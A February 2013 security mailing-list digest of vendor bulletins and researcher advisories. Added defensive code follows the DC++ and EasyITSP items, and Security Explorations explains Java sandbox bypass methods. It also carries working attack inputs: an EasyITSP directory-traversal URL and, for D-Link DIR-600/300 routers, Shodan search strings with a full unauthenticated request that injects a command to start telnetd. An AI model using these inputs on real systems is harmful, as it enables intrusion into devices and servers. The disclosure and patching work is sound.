v9.0x, v9.1x, and v9.20. The hotfixes can be obtained by contacting the
normal HP Services support channel. Customers should open a support case to
request the following hotfixes. Customers using NNMi v8.x should upgrade to
v9.0x, v9.1x, or 9.20 and apply the required patch and the hotfix.

For NNMi v9.0x and v9.1x

NNMi Version / Required Patch / Hotfix

9.0x / Patch 5 / Hotfix-NNMi-9.0xP5-UI-Security-20130125

9.1x / Patch 3 or 4 / Patches: HP-UX: PHSS_43078, Linux: NNM910L_5,
Solaris: NNM910S_5, Windows: NNM910W_5

9.20 / no patch required / Hotfix-NNMi-9.20-NmsAsShared-20130125

Note: The hotfix must be installed after the required patch. The hotfix must
be reinstalled if the required patch is reinstalled.

For NNMi v8.x

Upgrade to v9.0x, v9.1x, or v9.20 and apply the required patch and the hotfix
listed in the table above.

MANUAL ACTIONS: Yes - Update

Install the applicable patch and hotfix.

PRODUCT SPECIFIC INFORMATION

HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see: https://www.hp.com/go/swa

The following text is for use by the HP-UX Software Assistant.

AFFECTED VERSIONS

For HP-UX NNMi v9.1x

HP-UX B.11.31
=
HPOvNNM.HPOVNMSCAUSESV
HPOvNNM.HPOVNMSDISCOSV
HPOvNNM.HPOVICMP
HPOvNNM.HPOVNMSCONFIG
HPOvNNM.HPOVNNMCISCO
HPOvNNM.HPOVNNMOM
HPOvNNM.HPNMSCLUSTER
HPOvNNM.HPOVNMSEMBDDB
HPOvNNM.HPNMSDEVEXTN
HPOvNNM.HPOVNNMBSM
HPOvNNM.HPNNMTRAPSV
HPOvNNM.HPOVNMSHA
HPOvNnmSiteScope.HPOVNNMSITESCOPE
HPOvNNM.HPOVNMSEVTPSV
HPOvNNM.HPOVSTPLR
HPOvNNM.HPOVNMSCUSTCORR
HPOvNNM.HPOVNMSISPINET
HPOvNNM.HPNMSCOMPS
HPOvNNM.HPOVNNMINSTALL
HPOvNNM.HPOVNMSSNMPCO
HPOvNNM.HPNMSJBOSS
HPOvNNM.HPOVNMSSPMD
HPOvNNM.HPOVNNMNC
HPOvNNM.HPOVNNMNA
HPOvNNM.HPOVNMSLIC
HPOvNNM.HPOVNNMSIM
HPOvNNM.HPOVNNMNB
HPOvNNM.HPOVNNMUCMDB
HPOvNNM.HPOVNMSSPICOM
HPOvNNM.HPOVSNMP
HPOvNNM.HPOVNNMBAC
HPOvNnmRams.HPOVNNMRAMS
HPOvNNM.HPOVNMSCOMMON
HPOvNNM.HPOVNNMGEN
HPOvNNM.HPOVNNMUI
HPOvNNM.HPOVNMSRBA
HPOvNNM.HPOVPERFSPIADA
HPOvNNM.HPNMSCUSTPOLL
action: install PHSS_43078 or subsequent

END AFFECTED VERSIONS

HISTORY
Version:1 (rev.1) - 31 January 2013 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel.  For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hp.com.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430

Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in
the title by the two characters 

DC++ 0.802 and below incorrectly registers URI schemes in Windows

2013-02-04 Thread ullner
DC++ 0.802 and below incorrectly registers URI schemes in Windows

Background
DC++ [1] is a chat and file sharing application for the Direct Connect [2] 
network.

DC++ registers three URI schemes in Microsoft Windows; dchub, adc and magnet. 
Microsoft outlines the approach in 'Registering an Application to a URI scheme' 
[3].

Security issue description
DC++ 0.802 and below registers the application in the registry key 
HKEY_CURRENT_USER/Software/Classes/adc/Shell/Open/Command (for adc, likewise 
for dchub and magnet). DC++ registers the application with the following 
command:
"C:\Program Files (x86)\DC++\DCPlusPlus.exe" %1
(where the path mentioned is where DC++ is installed)

Microsoft notes in the 'launching the handler' section that an application 
should register itself with quotation marks around the parameter that is passed 
to the application. DC++ 0.802 and below do not do this, as shown above. 
Microsoft specifies that the proper registration should look like:
"C:\Program Files (x86)\DC++\DCPlusPlus.exe" "%1"

Microsoft notes in the same article potential attack vectors and potential 
formatting problems.

Fix description
A fix was deployed to the DC++ source control on 4th of January, 2013 [4], with 
the suggested changes from Microsoft. This fix is in DC++ 0.810.

Exploits
No known attacks or exploits are reported at this time.

Affected versions: 0.802 and below. Additionally, any modification of the 
application may be affected.

Found and fixed by: Fredrik Ullner ullner at gmail.com

References
[1] http://dcplusplus.sourceforge.net/
[2] http://en.wikipedia.org/wiki/Direct_Connect_(file_sharing)
[3] http://msdn.microsoft.com/en-us/library/aa767914.aspx
[4] http://bazaar.launchpad.net/~dcplusplus-team/dcplusplus/trunk/revision/3166
[5] 
http://sourceforge.net/projects/dcplusplus/files/DC%2B%2B%200.810/DCPlusPlus-0.810.exe/download?utm_expid=65835818-0utm_referrer=http%3A%2F%2Fdcplusplus.sourceforge.net%2Fdownload.html
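
The defect is visible in the registry text itself, so it can be audited without running DC++: export the handler keys and check that the executable path and the %1 parameter are each wrapped in quotation marks, as the Microsoft article cited above requires. The Python below is an added example, not DC++ or Microsoft code; the .reg export it parses is constructed for the example (the adc key mirrors the 0.802 registration described in the post, dchub the corrected form, and magnet a fully unquoted variant added to exercise the path check).

```python
import re
from typing import Dict, List

# Constructed .reg export, not a real DC++ export: the adc key mirrors the
# 0.802 registration from the post (path quoted, %1 not), dchub the corrected
# form, and magnet a fully unquoted variant to exercise the path check.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Classes\adc\shell\open\command]
@="\"C:\\Program Files (x86)\\DC++\\DCPlusPlus.exe\" %1"

[HKEY_CURRENT_USER\Software\Classes\dchub\shell\open\command]
@="\"C:\\Program Files (x86)\\DC++\\DCPlusPlus.exe\" \"%1\""

[HKEY_CURRENT_USER\Software\Classes\magnet\shell\open\command]
@="C:\\Program Files (x86)\\DC++\\DCPlusPlus.exe %1"
'''

# A key line for a URI scheme's open command; the scheme is the segment after Classes\.
KEY_RE = re.compile(r"^\[.*\\Classes\\([^\\\]]+)\\shell\\open\\command\]$", re.IGNORECASE)
# The key's default value as .reg writes it: @="...".
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"$')


def unescape_reg_string(raw: str) -> str:
    """Undo .reg string escaping: a backslash protects the next character."""
    return re.sub(r"\\(.)", r"\1", raw)


def command_issues(command: str) -> List[str]:
    """Checks the two quoting rules from Microsoft's registration guidance."""
    issues = []
    if not command.startswith('"'):
        issues.append("unquoted executable path")   # a path with spaces is ambiguous
    if "%1" in command and '"%1"' not in command:
        issues.append("unquoted %1")                # the URI text is spliced in bare
    return issues


def audit_reg_export(text: str) -> Dict[str, List[str]]:
    """Maps each URI scheme found in the export to its list of quoting issues."""
    findings: Dict[str, List[str]] = {}
    scheme = None
    for line in text.splitlines():
        line = line.strip()
        key = KEY_RE.match(line)
        if key:
            scheme = key.group(1).lower()
            continue
        if scheme is None:
            continue
        value = DEFAULT_VALUE_RE.match(line)
        if value:
            findings[scheme] = command_issues(unescape_reg_string(value.group(1)))
            scheme = None
    return findings


def proper_command(exe_path: str) -> str:
    """The registration form the post quotes from Microsoft: both parts quoted."""
    return '"%s" "%%1"' % exe_path


if __name__ == "__main__":
    for scheme, issues in audit_reg_export(SAMPLE_REG).items():
        print(scheme, issues or "ok")
```

On a live system the same text comes from `reg export HKCU\Software\Classes out.reg` (reg.exe writes UTF-16, so decode before parsing), and HKEY_CLASSES_ROOT and the per-machine HKLM hive deserve the same pass, since a handler can be registered in any of them. `proper_command()` produces the form Microsoft specifies and `command_issues()` returns an empty list for it.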


APPLE-SA-2013-02-01-1 Java for Mac OS X v10.6 Update 12

2013-02-04 Thread Apple Product Security
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

APPLE-SA-2013-02-01-1 Java for Mac OS X v10.6 Update 12

Java for Mac OS X v10.6 Update 12 is now available and addresses the
following:

Java
Available for:  Mac OS X v10.6.8, Mac OS X Server v10.6.8
Impact:  Multiple vulnerabilities in Java 1.6.0_37
Description:  Multiple vulnerabilities exist in Java 1.6.0_37, the
most serious of which may allow an untrusted Java applet to execute
arbitrary code outside the Java sandbox. Visiting a web page
containing a maliciously crafted untrusted Java applet may lead to
arbitrary code execution with the privileges of the current user.
These issues are addressed by updating to Java version 1.6.0_39.
Further information is available via the Java website at
http://www.oracle.com/technetwork/java/javase/releasenotes-136954.html
CVE-ID
CVE-2012-3213
CVE-2012-3342
CVE-2013-0351
CVE-2013-0409
CVE-2013-0419
CVE-2013-0423
CVE-2013-0424
CVE-2013-0425
CVE-2013-0426
CVE-2013-0427
CVE-2013-0428
CVE-2013-0429
CVE-2013-0432
CVE-2013-0433
CVE-2013-0434
CVE-2013-0435
CVE-2013-0438
CVE-2013-0440
CVE-2013-0441
CVE-2013-0442
CVE-2013-0443
CVE-2013-0445
CVE-2013-0446
CVE-2013-0450
CVE-2013-1473
CVE-2013-1475
CVE-2013-1476
CVE-2013-1478
CVE-2013-1480
CVE-2013-1481


Java for Mac OS X 10.6 Update 12 may be obtained
from the Software Update pane in System Preferences or
Apple's Software Downloads web site:
http://www.apple.com/support/downloads/

The download file is named: JavaForMacOSX10.6.dmg
Its SHA-1 digest is: 0c790491ca22ee009086ee1ec1f1b358024dd83e

Information will also be posted to the Apple Security Updates
web site: http://support.apple.com/kb/HT1222

This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/

-BEGIN PGP SIGNATURE-
Version: GnuPG/MacGPG2 v2.0.17 (Darwin)
Comment: GPGTools - http://gpgtools.org
-END PGP SIGNATURE-



[SECURITY] [DSA 2614-1] libupnp security update

2013-02-04 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2614-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
February 01, 2013  http://www.debian.org/security/faq
- -

Package: libupnp
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 
 CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965
Debian Bug : 699316

Multiple stack-based buffer overflows were discovered in libupnp, a library
used for handling the Universal Plug and Play protocol. HD Moore from Rapid7
discovered that SSDP queries were not correctly handled by the
unique_service_name() function.

An attacker sending carefully crafted SSDP queries to a daemon built on libupnp
could generate a buffer overflow, overwriting the stack, leading to the daemon
crash and possible remote code execution.

For the stable distribution (squeeze), these problems have been fixed in
version 1:1.6.6-5+squeeze1.

For the testing distribution (wheezy), these problems have been fixed in
version 1:1.6.17-1.2.

For the unstable distribution (sid), these problems have been fixed in
version 1:1.6.17-1.2.

We recommend that you upgrade your libupnp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2615-1] libupnp4 security update

2013-02-04 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

- -
Debian Security Advisory DSA-2615-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
February 01, 2013  http://www.debian.org/security/faq
- -

Package: libupnp4
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-5958 CVE-2012-5959 CVE-2012-5960 CVE-2012-5961 
 CVE-2012-5962 CVE-2012-5963 CVE-2012-5964 CVE-2012-5965
Debian Bug : 699459

Multiple stack-based buffer overflows were discovered in libupnp4, a library
used for handling the Universal Plug and Play protocol. HD Moore from Rapid7
discovered that SSDP queries were not correctly handled by the
unique_service_name() function.

An attacker sending carefully crafted SSDP queries to a daemon built on
libupnp4 could generate a buffer overflow, overwriting the stack, leading to
the daemon crash and possible remote code execution.

For the stable distribution (squeeze), these problems have been fixed in
version 1.8.0~svn20100507-1+squeeze1.

For the testing distribution (wheezy), these problems have been fixed in
version 1.8.0~svn20100507-1.2.

For the unstable distribution (sid), these problems have been fixed in
version 1.8.0~svn20100507-1.2.

We recommend that you upgrade your libupnp4 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2617-1] samba security update

2013-02-04 Thread Luciano Bello
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2617-1   secur...@debian.org
http://www.debian.org/security/ Luciano Bello
February 02, 2013  http://www.debian.org/security/faq
- -

Package: samba
Vulnerability  : several issues
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-0213 CVE-2013-0214

Jann Horn reported two vulnerabilities in Samba, a popular
cross-platform network file and printer sharing suite. In particular,
these vulnerabilities affect SWAT, the Samba Web Administration Tool.

CVE-2013-0213: Clickjacking issue in SWAT
An attacker can embed a SWAT page in a malicious web page via a
frame or iframe and then overlay it with other content. If an
authenticated valid user interacts with this malicious web page, she
might perform unintended changes in the Samba settings.

CVE-2013-0214: Potential Cross-site request forgery
An attacker can persuade a valid SWAT user, who is logged in, to
click a malicious link and trigger arbitrary unintended changes in
the Samba settings.

For the stable distribution (squeeze), these problems have been fixed in
version 3.5.6~dfsg-3squeeze9.

For the testing distribution (wheezy), these problems have been fixed in
version 2:3.6.6-5.

For the unstable distribution (sid), these problems have been fixed in
version 2:3.6.6-5.

We recommend that you upgrade your samba packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[SECURITY] [DSA 2616-1] nagios3 security update

2013-02-04 Thread Jonathan Wiltshire
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2616-1   secur...@debian.org
http://www.debian.org/security/ Jonathan Wiltshire
February 03, 2013  http://www.debian.org/security/faq
- -

Package: nagios3
Vulnerability  : buffer overflow in CGI scripts
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2012-6096
Debian Bug : 697930

A buffer overflow problem has been found in nagios3, a host/service/network
monitoring and management system. A malicious client could craft a
request to history.cgi and cause application crashes.

For the stable distribution (squeeze), this problem has been fixed in
version 3.2.1-2+squeeze1.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 3.4.1-3.

We recommend that you upgrade your nagios3 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



Directory Traversal - EasyITSP = 2.0.7

2013-02-04 Thread Michał Błaszczak
Directory Traversal - EasyITSP = 2.0.7

EasyITSP - Telephone System VoIP

http://blaszczakm.blogspot.com
Michal Blaszczak

Search/Read/Delete filetype *.txt
Search/Play/Delete filetype *.wav - Voicemail

file: voicemail.php line: 220

foreach (glob("$vmdir/$_SESSION[phone]/$vmfolder/*.txt") as $filename) {

file: voicemail.php line: 186 - 190

if(isset($_GET['folder'])) {
$vmfolder = $_GET['folder'];
} else {
$vmfolder = "INBOX";
}

POC:
http:///easyitsp/WEB/customer/voicemail.php?currentpage=phones&folder=../../

Michał Błaszczak
http://blaszczakm.blogspot.com
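A hardened replacement for the folder handling quoted in the advisory above, as an added example that is not EasyITSP's code: the folder name is checked against an allow-list before it reaches glob(), and the resolved path is additionally verified to stay inside the voicemail base directory. The function name, the list of allowed folder names and the constructed demo directory tree are assumptions.

```php
<?php
// Added example, not EasyITSP's code: a safe way to derive the voicemail
// folder from $_GET['folder'] instead of passing it straight into glob().

// Folder names the application itself creates (assumed list); anything
// else, including "../", is rejected before any filesystem access.
const ALLOWED_VM_FOLDERS = ['INBOX', 'Old', 'Work', 'Family', 'Friends'];

/**
 * Resolve the voicemail folder for a mailbox, or return null if the
 * request does not point inside that mailbox.
 */
function resolve_vm_folder(string $vmdir, string $phone, ?string $folder): ?string
{
    // 1. Allow-list the folder name: no separators, no "..", no empty value.
    $folder = $folder ?? 'INBOX';
    if (!in_array($folder, ALLOWED_VM_FOLDERS, true)) {
        return null;
    }
    // 2. The mailbox id comes from the session, but it should still be a
    //    plain digit string; refuse anything else.
    if (!preg_match('/^[0-9]+$/', $phone)) {
        return null;
    }
    // 3. Defence in depth: after canonicalisation the path must still be
    //    inside $vmdir (catches symlinks or a mis-configured base dir).
    $base   = realpath($vmdir);
    $target = realpath("$vmdir/$phone/$folder");
    if ($base === false || $target === false) {
        return null; // base directory or folder does not exist
    }
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Demo on a constructed directory tree in the system temp dir.
$vmdir = sys_get_temp_dir() . '/vm_demo_' . getmypid();
mkdir("$vmdir/1001/INBOX", 0700, true);
file_put_contents("$vmdir/1001/INBOX/msg0000.txt", "constructed sample\n");
file_put_contents("$vmdir/secret.txt", "should never be listed\n");

$cases = [
    ['1001', 'INBOX'],        // legitimate request
    ['1001', '../../'],       // the traversal value from the advisory
    ['1001', '../'],          // would land in $vmdir itself
    ['1001/../..', 'INBOX'],  // tampered mailbox id
    ['1001', null],           // parameter missing -> INBOX
];
foreach ($cases as [$phone, $folder]) {
    $dir   = resolve_vm_folder($vmdir, $phone, $folder);
    $label = var_export($folder, true);
    if ($dir === null) {
        echo "phone=$phone folder=$label -> rejected\n";
        continue;
    }
    $files = array_map('basename', glob("$dir/*.txt"));
    echo "phone=$phone folder=$label -> " . implode(',', $files) . "\n";
}

// Clean up the demo tree.
unlink("$vmdir/1001/INBOX/msg0000.txt");
unlink("$vmdir/secret.txt");
rmdir("$vmdir/1001/INBOX");
rmdir("$vmdir/1001");
rmdir($vmdir);
```

Only the first and last cases list msg0000.txt; every traversal attempt is rejected before glob() runs.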


NGS00336 Patch Notification: Symantec Network Access Control Privilege Escalation

2013-02-04 Thread NCC Group Research
Medium Risk Vulnerability in Symantec Network Access Control 

04 February 2013

Gavin Jones of NCC Group has discovered a Medium risk vulnerability in Symantec 
Endpoint Protection Version 12.1.1000.157.105

Impact: Privilege escalation

Versions affected: Symantec Network Access Control v12.1 and previous 

An updated version of the software has been released to address the 
vulnerability:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20121210_00

NCC Group is going to withhold details of this flaw for three months. This 
three month window will allow users the time needed to apply the patch before 
the details are released to the general public. This reflects the NCC Group 
approach to responsible disclosure.

NCC Group Research
http://www.nccgroup.com





NGS00315 Patch Notification: Symantec Enterprise Security Management Agent Privilege Escalation

2013-02-04 Thread NCC Group Research
Medium Risk Vulnerability in Symantec Enterprise Security Management 

04 February 2013

Gavin Jones of NCC Group has discovered a Medium risk vulnerability in Symantec 
Enterprise Security Management 9.0.1 Agent (version 9.0.1153.20001)

Impact: Privilege escalation

Versions affected: Symantec Enterprise Security Manager (and Agent) for Windows 
v10.x and previous 

An updated version of the software has been released to address the 
vulnerability:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20121213_00

NCC Group is going to withhold details of this flaw for three months. This 
three month window will allow users the time needed to apply the patch before 
the details are released to the general public. This reflects the NCC Group 
approach to responsible disclosure.

NCC Group Research
http://www.nccgroup.com





[SE-2012-01] Details of issues fixed by Feb 2013 Java SE CPU

2013-02-04 Thread Security Explorations


Hello All,

Below, we are providing you with technical details regarding
security issues reported by us to Oracle and addressed by the
company in a recent Feb 2013 Java SE CPU [1].

[Issue 29]
This issue allows for the creation of arbitrary Proxy objects
for interfaces defined in restricted packages. Proxy objects
defined in a NULL class loader namespaces are of a particular
interest here. Such objects can be used to manipulate instances
of certain restricted classes.

In our Proof of Concept code we create such a proxy object for
the com.sun.xml.internal.bind.v2.model.nav.Navigator interface.
In order to use the aforementioned proxy object, we need an
instance of that interface too. We obtain it with the help of
Issue 28, which allows access to arbitrary field objects from
restricted classes and interfaces. As a result, by combining
Issues 27-29, one can use the Navigator interface and make use of
its sensitive Reflection API functionality such as obtaining
access to methods of arbitrary classes. That condition can be
further leveraged to obtain a complete JVM security bypass.

Please, note that our Proof of Concept code for Issues 27-29
was reported to Oracle in Apr 2012 and depending Issues 27-28
were addressed by the company sooner than Issue 29. Testing
of the PoC will thus give best results on older versions of
Java SE 7.

[Issue 50]
Issue 50 allows to violate a fundamental security constraint
of Java VM, which is type safety. This vulnerability is another
instance of the problem related to the unsafe deserialization
implemented by com.sun.corba.se.impl.io.ObjectStreamClass class.
Its first instance was fixed by Oracle in Oct 2011 [2] and it
stemmed from the fact that during deserialization insufficient
type checks were done with respect to object references that
were written to target object instance created by the means of
deserialization. Such a reference writing was accomplished with
the use of a native functionality of sun.corba.Bridge class.

The problem that we found back in Sep 2012 was very similar to
the first one. It was located in the same code (class) and was
also exploiting direct writing of object references to memory
with the use of putObject method. While the first type confusion
issue allowed to write object references of incompatible types
to correct field offsets, Issue 50 relied on the possibility to
write object references of incompatible types to...invalid field
offsets.

It might also be worth mentioning that Issue 50 was found to
be present in Java SE Embedded [3]. That is a Java version that
is based on desktop Java SE and is used in today's most powerful
embedded systems such as aircraft and medical systems [4]. We
verified that Oracle Java SE Embedded ver. 7 Update 6 from 10
Aug 2012 for ARM / Linux contained vulnerable implementation
of ObjectStreamClass class.

Unfortunately, we don't know any details regarding the impact
of Issue 50 in the embedded space (which embedded systems are
vulnerable to it, whether any feasible attack vectors exist,
etc.). So, it's up to Oracle to clarify any potential concerns
in that area.

[Issue 52]
Issue 52 relies on the possibility to call no-argument methods
on arbitrary objects or classes. The vulnerability has its origin
in com.sun.jmx.mbeanserver.Introspector class which is located
in the same package as the infamous MBeanInstantiator bug found
in the wild in early Jan 2013. The flaw stems from insecure call
to invoke method of java.lang.reflect.Method class:

if (method != null)
  return method.invoke(obj, new Object[0]);

In our Proof of Concept code we exploit the above implementation
by making a call to getDeclaredMethods method of java.lang.Class
class to gain access to methods of restricted classes. This is
accomplished with the use of the following code sequence:

Introspector.elementFromComplex((Object)clazz,"declaredMethods")

Access to public method objects of arbitrary restricted classes
is sufficient to achieve a complete Java VM security sandbox
compromise. We make use of DefiningClassLoader exploit vector
for that purpose.

[Issue 53]
Issue 53 stems from the fact that Oracle's implementation of new
security levels introduced by the company in Java SE 7 Update 10
did not take into account the fact that Applets can be instantiated
with the use of serialization. Such a possibility is indicated both
in HTML 4 Specification [5] as well as in Oracle's code.

HTML 4 Specification contains the following description for the
object attribute of APPLET element:

object = cdata [CS]
   This attribute names a resource containing a serialized
   representation of an applet's state. It is interpreted
   relative to the applet's codebase. The serialized data
   contains the applet's class name but not the implementation.
   The class name is used to retrieve the implementation from
   a class file or archive.

Additionally, Java 7 Update 10 (and 11) reveal the following code
logic when it comes to 

[IMF 2013] Call for Participation

2013-02-04 Thread Oliver Goebel
Dear all,

please find enclosed the call for participation for IMF 2013.

See the program at:
http://www.imf-conference.org/imf2013/program.html

The conference will take place from Tuesday, March 12th through Thursday,
March 14th in Nuremberg, Germany.

Registration Details can be found at:
http://www.imf-conference.org/imf2013/registration.html

Early registration discounts will be available until February 25th, 2013.

Information on booking hotel rooms can be found here:
http://www1.gi-ev.de/fachbereiche/sicherheit/fg/sidar/imf/imf2013/location.html

Room allocations are not depleted yet and can be used until February 6th.


Please excuse possible cross postings.


CALL FOR PARTICIPATION

   IMF 2013

  7th International Conference
   on IT Security Incident Management & IT Forensics
 
March 12th - 14th, 2013
  Nuremberg,  Germany



Conference Background
=====================
Today IT security is an integral aspect in operating IT-Systems.  Yet,
despite high-end precautionary measures taken, not every attack or
security mishap can be prevented and hence incidents will go on
happening.  In such cases forensic capabilities in investigating
incidents in both technical and legal aspects are paramount.  Thus,
capable incident response and forensic procedures have gained essential
relevance in IT infrastructure operations and there is ample need for
research and standardization in this area.

In law enforcement IT forensics is an important branch and its
significance constantly increases since IT has become an essential part
in almost every aspect of daily life. IT systems produce traces and
evidence in many ways that play a more and more relevant role in
resolving cases.


Conference Goals
================
The IMF conference provides a platform for experts from throughout the
world to present and discuss recent technical and methodical advances in
the fields of IT security incident response and management and IT
forensics.  It shall enable collaboration and exchange of ideas between
industry (both as users and solution providers), academia,
law-enforcement and other government bodies.


CONFERENCE PROGRAM
==================
Please find the conference program at:

   http://www.imf-conference.org/imf2013/program.html


REGISTRATION
============
Please find an overview of the conference fees as well as the
registration form at:

   http://www.imf-conference.org/imf2013/registration.html

Early registration discounts will be available until

  February 25th, 2013



Conference Chair
================
Felix Freiling
Friedrich-Alexander-Universitaet Erlangen-Nuernberg
chair-2...@imf-conference.org


Program Chair
=============
Holger Morgenstern
IT Expert Witness, gutachten.info
pc-chair-2...@imf-conference.org


Sponsor Chair
=============
sponsor-chair-2...@imf-conference.org 


Organizing Committee
====================
Jack Cole
Ralf Ehlert
Felix Freiling
Sandra Frings
Oliver Goebel
Detlef Guenther
Stefan Kiltz
Holger Morgenstern
Jens Nedon
Dirk Schadt


Program Committee
=================
Rafael Accorsi, Universitaet Freiburg, Germany
Harald Baier, Hochschule Darmstadt/CASED, Germany
Davide Balzarotti, Institut Eurecom, France
Herbert Bos, VU Amsterdam, Netherlands
Susan Brenner, University of Dayton, USA
Levente Buttyan, TU Budapest/CRYSYS, Hungary
Jack Cole, US Army Research Laboratory, USA
Andrew Cormack, JANET, UK
Ralf Ehlert, Universitaet Magdeburg, Germany
Felix Freiling, Friedrich-Alexander-University (FAU), Germany
Sandra Frings, Fraunhofer IAO, Germany
Pavel Gladyshev, UCD, Ireland
Oliver Goebel, Universitaet Stuttgart, Germany
Bernd  Grobauer, Siemens CERT, Germany
Detlef Günther, Volkswagen AG, Germany
Vijay Gurbani, Bell Labs, USA
Daniel Hammer, Hochschule Offenburg, Germany
Bernhard Hämmerli, ACRIS GmbH, Switzerland
Stefan Kiltz, Universitaet Magdeburg, Germany
Lam Kwok, PrivyLink International Ltd, Singapore
Jim Lyle, NIST, USA
Bob Martin, MITRE Corp., USA
Ralf Moll, LKA Baden-Wuerttemberg, Germany
Holger Morgenstern, gutachten.info, Germany
Jens Nedon, IABG mbH, Germany
Dirk Schadt, SPOT, Germany
Mark Schiller, Statton Security Ltd, UK
Marko Schuba, FH Aachen, Germany
Andreas Schuster, Deutsche Telekom, Germany
Asia Slowinska, VU Amsterdam, Netherlands
Marco Thorbrügge, ENISA, EU
Stephen Wolthusen, Royal Holloway, Univ. of London, UK


Steering Committee
==================
Sandra Frings
Oliver Goebel
Detlef Guenther
Holger Morgenstern
Jens Nedon
Dirk Schadt


Under the Auspices of
=====================
German Informatics Society (GI e.V.)
Wissenschaftszentrum Ahrstr. 45, 53175 Bonn, Germany Tel.: +49 228 302
145, Fax: +49 228 302 167
Special Interest Group SIDAR


Supported by
============
Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)

2013-02-04 Thread devnull
Device Name: DIR-600 / DIR 300 - HW rev B1
Vendor: D-Link

 Vulnerable Firmware Releases - DIR-300: 

Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012

 Vulnerable Firmware Releases - DIR-600: 

Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013

 Device Description: 

D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high 
performance end-to-end wireless connectivity based on 802.11n technology. The 
DIR-600 provides better wireless coverage and improved speeds over standard 
802.11g*. Upgrading your home network to Wireless 150 provides an excellent 
solution for experiencing better wireless performance while sharing a broadband 
Internet connection with multiple computers over a secure wireless network.

Source (dead): 
http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
German website: 
http://www.dlink.de/cs/Satellite?c=TechSupport_Cchildpagename=DLinkEuro...

 Shodan Dorks 

Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600

 Vulnerability Overview: 

* OS Command Injection (unauthenticated) 

= Parameter cmd

The vulnerability is caused by missing access restrictions and missing input 
validation in the cmd parameter and can be exploited to inject and execute 
arbitrary shell commands.
It is possible to start a telnetd to compromise the device.

WARNING: You do not need to be authenticated to the device!

Screenshot: 
http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DIR-600-OS-Command-Injectino.png

starting a telnet server:
Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 
Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

You do not need to be authenticated to the device for executing the malicious 
commands. You could prepare the whole request and execute it without any 
authentication details.

For example you could start the telnetd on other ports and interfaces. So with 
this you are able to get a full shell *h00ray*

Nmap Scan after starting the telnetd:
Nmap scan report for 192.168.178.222
Host is up (0.022s latency).
Not shown: 995 closed ports
PORT   STATE    SERVICE VERSION
